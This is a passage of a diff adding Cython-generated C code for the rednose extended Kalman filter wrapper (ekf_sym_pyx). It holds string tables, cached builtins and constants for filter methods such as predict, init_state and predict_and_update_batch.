sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_itemsize, __pyx_k_itemsize, sizeof(__pyx_k_itemsize), 0, 0, 1, 1}, + {&__pyx_kp_s_itemsize_0_for_cython_array, __pyx_k_itemsize_0_for_cython_array, sizeof(__pyx_k_itemsize_0_for_cython_array), 0, 0, 1, 0}, + {&__pyx_n_s_join, __pyx_k_join, sizeof(__pyx_k_join), 0, 0, 1, 1}, + {&__pyx_n_s_kind, __pyx_k_kind, sizeof(__pyx_k_kind), 0, 0, 1, 1}, + {&__pyx_n_s_logger, __pyx_k_logger, sizeof(__pyx_k_logger), 0, 0, 1, 1}, + {&__pyx_n_s_maha_test, __pyx_k_maha_test, sizeof(__pyx_k_maha_test), 0, 0, 1, 1}, + {&__pyx_n_s_maha_test_kinds, __pyx_k_maha_test_kinds, sizeof(__pyx_k_maha_test_kinds), 0, 0, 1, 1}, + {&__pyx_n_s_maha_thresh, __pyx_k_maha_thresh, sizeof(__pyx_k_maha_thresh), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_max_rewind_age, __pyx_k_max_rewind_age, sizeof(__pyx_k_max_rewind_age), 0, 0, 1, 1}, + {&__pyx_n_s_memview, __pyx_k_memview, sizeof(__pyx_k_memview), 0, 0, 1, 1}, + {&__pyx_n_s_mode, __pyx_k_mode, sizeof(__pyx_k_mode), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_2, __pyx_k_name_2, sizeof(__pyx_k_name_2), 0, 0, 1, 1}, + {&__pyx_n_s_nan, __pyx_k_nan, sizeof(__pyx_k_nan), 0, 0, 1, 1}, + {&__pyx_n_s_ndim, __pyx_k_ndim, sizeof(__pyx_k_ndim), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_norm_quats, __pyx_k_norm_quats, sizeof(__pyx_k_norm_quats), 0, 0, 1, 1}, + {&__pyx_n_s_np, __pyx_k_np, sizeof(__pyx_k_np), 0, 0, 1, 1}, + {&__pyx_n_s_numpy, __pyx_k_numpy, sizeof(__pyx_k_numpy), 0, 0, 1, 1}, + {&__pyx_kp_u_numpy_core_multiarray_failed_to, __pyx_k_numpy_core_multiarray_failed_to, sizeof(__pyx_k_numpy_core_multiarray_failed_to), 0, 1, 0, 0}, + {&__pyx_kp_u_numpy_core_umath_failed_to_impor, __pyx_k_numpy_core_umath_failed_to_impor, sizeof(__pyx_k_numpy_core_umath_failed_to_impor), 0, 1, 0, 0}, + {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, + {&__pyx_n_s_order, __pyx_k_order, sizeof(__pyx_k_order), 0, 0, 1, 1}, + {&__pyx_n_s_pack, __pyx_k_pack, sizeof(__pyx_k_pack), 0, 0, 1, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_predict, __pyx_k_predict, sizeof(__pyx_k_predict), 0, 0, 1, 1}, + {&__pyx_n_s_predict_and_update_batch, __pyx_k_predict_and_update_batch, sizeof(__pyx_k_predict_and_update_batch), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle_Enum, __pyx_k_pyx_unpickle_Enum, sizeof(__pyx_k_pyx_unpickle_Enum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_s_quaternion_idxs, __pyx_k_quaternion_idxs, sizeof(__pyx_k_quaternion_idxs), 0, 0, 1, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_k_rednose_helpers_ekf_sym_pyx, sizeof(__pyx_k_rednose_helpers_ekf_sym_pyx), 0, 0, 1, 1}, + {&__pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_k_rednose_helpers_ekf_sym_pyx_pyx, sizeof(__pyx_k_rednose_helpers_ekf_sym_pyx_pyx), 0, 0, 1, 0}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_register, __pyx_k_register, sizeof(__pyx_k_register), 0, 0, 1, 1}, + {&__pyx_n_s_res, __pyx_k_res, sizeof(__pyx_k_res), 0, 0, 1, 1}, + {&__pyx_n_s_reset_rewind, __pyx_k_reset_rewind, sizeof(__pyx_k_reset_rewind), 0, 0, 1, 1}, + {&__pyx_n_s_rts_smooth, __pyx_k_rts_smooth, sizeof(__pyx_k_rts_smooth), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_set_filter_time, __pyx_k_set_filter_time, sizeof(__pyx_k_set_filter_time), 0, 0, 1, 1}, + {&__pyx_n_s_set_global, __pyx_k_set_global, sizeof(__pyx_k_set_global), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_shape, __pyx_k_shape, sizeof(__pyx_k_shape), 0, 0, 1, 1}, + {&__pyx_n_s_size, __pyx_k_size, sizeof(__pyx_k_size), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, + {&__pyx_n_s_state, __pyx_k_state, sizeof(__pyx_k_state), 0, 0, 1, 1}, + {&__pyx_n_s_state_b, __pyx_k_state_b, sizeof(__pyx_k_state_b), 0, 0, 1, 1}, + {&__pyx_n_s_step, __pyx_k_step, sizeof(__pyx_k_step), 0, 0, 1, 1}, + {&__pyx_n_s_stop, __pyx_k_stop, sizeof(__pyx_k_stop), 0, 0, 1, 1}, + {&__pyx_kp_s_strided_and_direct, __pyx_k_strided_and_direct, sizeof(__pyx_k_strided_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_direct_or_indirect, __pyx_k_strided_and_direct_or_indirect, sizeof(__pyx_k_strided_and_direct_or_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_indirect, __pyx_k_strided_and_indirect, sizeof(__pyx_k_strided_and_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_struct, __pyx_k_struct, sizeof(__pyx_k_struct), 0, 0, 1, 1}, + {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, + {&__pyx_n_s_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 0, 1, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_tmpvec, __pyx_k_tmpvec, sizeof(__pyx_k_tmpvec), 0, 0, 1, 1}, + {&__pyx_kp_s_unable_to_allocate_array_data, __pyx_k_unable_to_allocate_array_data, sizeof(__pyx_k_unable_to_allocate_array_data), 0, 0, 1, 0}, + {&__pyx_kp_s_unable_to_allocate_shape_and_str, __pyx_k_unable_to_allocate_shape_and_str, sizeof(__pyx_k_unable_to_allocate_shape_and_str), 0, 0, 1, 0}, + {&__pyx_n_s_unpack, __pyx_k_unpack, sizeof(__pyx_k_unpack), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_u_utf8, __pyx_k_utf8, sizeof(__pyx_k_utf8), 0, 1, 0, 1}, + {&__pyx_n_s_val, __pyx_k_val, sizeof(__pyx_k_val), 0, 0, 1, 1}, + {&__pyx_n_s_version_info, __pyx_k_version_info, sizeof(__pyx_k_version_info), 0, 0, 1, 1}, + {&__pyx_n_s_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 1, 1}, + {&__pyx_n_s_x_initial, __pyx_k_x_initial, sizeof(__pyx_k_x_initial), 0, 0, 1, 1}, + {&__pyx_n_s_z, __pyx_k_z, sizeof(__pyx_k_z), 0, 0, 1, 1}, + {&__pyx_n_s_z_map, __pyx_k_z_map, sizeof(__pyx_k_z_map), 0, 0, 1, 1}, + {&__pyx_n_s_zi, __pyx_k_zi, sizeof(__pyx_k_zi), 0, 0, 1, 1}, + {&__pyx_n_s_zi_b, __pyx_k_zi_b, sizeof(__pyx_k_zi_b), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_NotImplementedError = __Pyx_GetBuiltinName(__pyx_n_s_NotImplementedError); if (!__pyx_builtin_NotImplementedError) __PYX_ERR(0, 178, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin___import__ = __Pyx_GetBuiltinName(__pyx_n_s_import); if (!__pyx_builtin___import__) __PYX_ERR(1, 100, __pyx_L1_error) + __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(1, 141, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 156, __pyx_L1_error) + __pyx_builtin_enumerate = __Pyx_GetBuiltinName(__pyx_n_s_enumerate); if (!__pyx_builtin_enumerate) __PYX_ERR(1, 159, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(1, 261, __pyx_L1_error) + __pyx_builtin_AssertionError = __Pyx_GetBuiltinName(__pyx_n_s_AssertionError); if (!__pyx_builtin_AssertionError) __PYX_ERR(1, 373, __pyx_L1_error) + __pyx_builtin_Ellipsis = __Pyx_GetBuiltinName(__pyx_n_s_Ellipsis); if (!__pyx_builtin_Ellipsis) __PYX_ERR(1, 408, __pyx_L1_error) + __pyx_builtin_id = __Pyx_GetBuiltinName(__pyx_n_s_id); if (!__pyx_builtin_id) __PYX_ERR(1, 618, __pyx_L1_error) + __pyx_builtin_IndexError = __Pyx_GetBuiltinName(__pyx_n_s_IndexError); if (!__pyx_builtin_IndexError) __PYX_ERR(1, 914, __pyx_L1_error) + __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(2, 986, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __pyx_tuple__4 = PyTuple_New(1); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__4); + __Pyx_INCREF(__pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_int_neg_1); + PyTuple_SET_ITEM(__pyx_tuple__4, 0, __pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_tuple__4); + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_slice__5 = PySlice_New(Py_None, Py_None, Py_None); if (unlikely(!__pyx_slice__5)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_tuple__8 = PyTuple_Pack(3, __pyx_int_136983863, __pyx_int_112105877, __pyx_int_184977713); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__8); + __Pyx_GIVEREF(__pyx_tuple__8); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_tuple__15 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_multiarray_failed_to); if (unlikely(!__pyx_tuple__15)) __PYX_ERR(2, 986, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__15); + __Pyx_GIVEREF(__pyx_tuple__15); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_tuple__16 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_umath_failed_to_impor); if (unlikely(!__pyx_tuple__16)) __PYX_ERR(2, 992, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__16); + __Pyx_GIVEREF(__pyx_tuple__16); + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_tuple__37 = PyTuple_Pack(1, __pyx_n_s_sys); if (unlikely(!__pyx_tuple__37)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__37); + __Pyx_GIVEREF(__pyx_tuple__37); + __pyx_tuple__38 = PyTuple_Pack(2, __pyx_int_3, __pyx_int_3); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_tuple__39 = PyTuple_Pack(1, __pyx_kp_s_collections_abc); if (unlikely(!__pyx_tuple__39)) __PYX_ERR(1, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__39); + __Pyx_GIVEREF(__pyx_tuple__39); + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + __pyx_tuple__40 = PyTuple_Pack(1, __pyx_n_s_collections); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__40); + __Pyx_GIVEREF(__pyx_tuple__40); + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_tuple__41 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct_or_indirect); if (unlikely(!__pyx_tuple__41)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__41); + __Pyx_GIVEREF(__pyx_tuple__41); + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_tuple__42 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct); if (unlikely(!__pyx_tuple__42)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__42); + __Pyx_GIVEREF(__pyx_tuple__42); + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__43 = PyTuple_Pack(1, __pyx_kp_s_strided_and_indirect); if (unlikely(!__pyx_tuple__43)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__43); + __Pyx_GIVEREF(__pyx_tuple__43); + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_tuple__44 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_direct); if (unlikely(!__pyx_tuple__44)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__44); + __Pyx_GIVEREF(__pyx_tuple__44); + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__45 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_indirect); if (unlikely(!__pyx_tuple__45)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__45); + __Pyx_GIVEREF(__pyx_tuple__45); + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__46 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__46)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__46); + __Pyx_GIVEREF(__pyx_tuple__46); + __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle_Enum, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":108 + * ) + * + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + */ + __pyx_tuple__48 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_state, __pyx_n_s_covs, __pyx_n_s_filter_time, __pyx_n_s_state_b, __pyx_n_s_covs_b); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__48); + __Pyx_GIVEREF(__pyx_tuple__48); + __pyx_codeobj__20 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__48, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_init_state, 108, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__20)) __PYX_ERR(0, 108, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":117 + * ) + * + * def state(self): # <<<<<<<<<<<<<< + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) + * return res + */ + __pyx_tuple__49 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_res); if (unlikely(!__pyx_tuple__49)) __PYX_ERR(0, 117, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__49); + __Pyx_GIVEREF(__pyx_tuple__49); + __pyx_codeobj__21 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__49, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_state, 117, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__21)) __PYX_ERR(0, 117, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":121 + * return res + * + * def covs(self): # <<<<<<<<<<<<<< + * return matrix_to_numpy(self.ekf.covs()) + * + */ + __pyx_tuple__50 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__50)) __PYX_ERR(0, 121, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__50); + __Pyx_GIVEREF(__pyx_tuple__50); + __pyx_codeobj__22 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_covs, 121, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__22)) __PYX_ERR(0, 121, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":124 + * return matrix_to_numpy(self.ekf.covs()) + * + * def set_filter_time(self, double t): # <<<<<<<<<<<<<< + * self.ekf.set_filter_time(t) + * + */ + __pyx_tuple__51 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_t); if (unlikely(!__pyx_tuple__51)) __PYX_ERR(0, 124, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__51); + __Pyx_GIVEREF(__pyx_tuple__51); + __pyx_codeobj__23 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__51, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_set_filter_time, 124, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__23)) __PYX_ERR(0, 124, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":127 + * self.ekf.set_filter_time(t) + * + * def get_filter_time(self): # <<<<<<<<<<<<<< + * return self.ekf.get_filter_time() + * + */ + __pyx_codeobj__24 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_get_filter_time, 127, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__24)) __PYX_ERR(0, 127, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":130 + * return self.ekf.get_filter_time() + * + * def set_global(self, str global_var, double val): # <<<<<<<<<<<<<< + * self.ekf.set_global(global_var.encode('utf8'), val) + * + */ + __pyx_tuple__52 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_global_var, __pyx_n_s_val); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 130, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__52); + __Pyx_GIVEREF(__pyx_tuple__52); + __pyx_codeobj__25 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_set_global, 130, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__25)) __PYX_ERR(0, 130, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":133 + * self.ekf.set_global(global_var.encode('utf8'), val) + * + * def reset_rewind(self): # <<<<<<<<<<<<<< + * self.ekf.reset_rewind() + * + */ + __pyx_codeobj__26 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_reset_rewind, 133, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__26)) __PYX_ERR(0, 133, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":136 + * self.ekf.reset_rewind() + * + * def predict(self, double t): # <<<<<<<<<<<<<< + * self.ekf.predict(t) + * + */ + __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__51, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_predict, 136, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(0, 136, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":139 + * self.ekf.predict(t) + * + * def predict_and_update_batch(self, double t, int kind, z, R, extra_args=[[]], bool augment=False): # <<<<<<<<<<<<<< + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + */ + __pyx_tuple__53 = PyTuple_Pack(20, __pyx_n_s_self, __pyx_n_s_t, __pyx_n_s_kind, __pyx_n_s_z, __pyx_n_s_R, __pyx_n_s_extra_args, __pyx_n_s_augment, __pyx_n_s_z_map, __pyx_n_s_zi_b, __pyx_n_s_zi, __pyx_n_s_R_map, __pyx_n_s_Ri_b, __pyx_n_s_Ri, __pyx_n_s_extra_args_map, __pyx_n_s_args_map, __pyx_n_s_args, __pyx_n_s_a, __pyx_n_s_res, __pyx_n_s_tmpvec, __pyx_n_s_tmpvec); if (unlikely(!__pyx_tuple__53)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__53); + __Pyx_GIVEREF(__pyx_tuple__53); + __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(7, 0, 0, 20, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__53, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_predict_and_update_batch, 139, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 139, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":177 + * ) + * + * def augment(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_codeobj__30 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_augment, 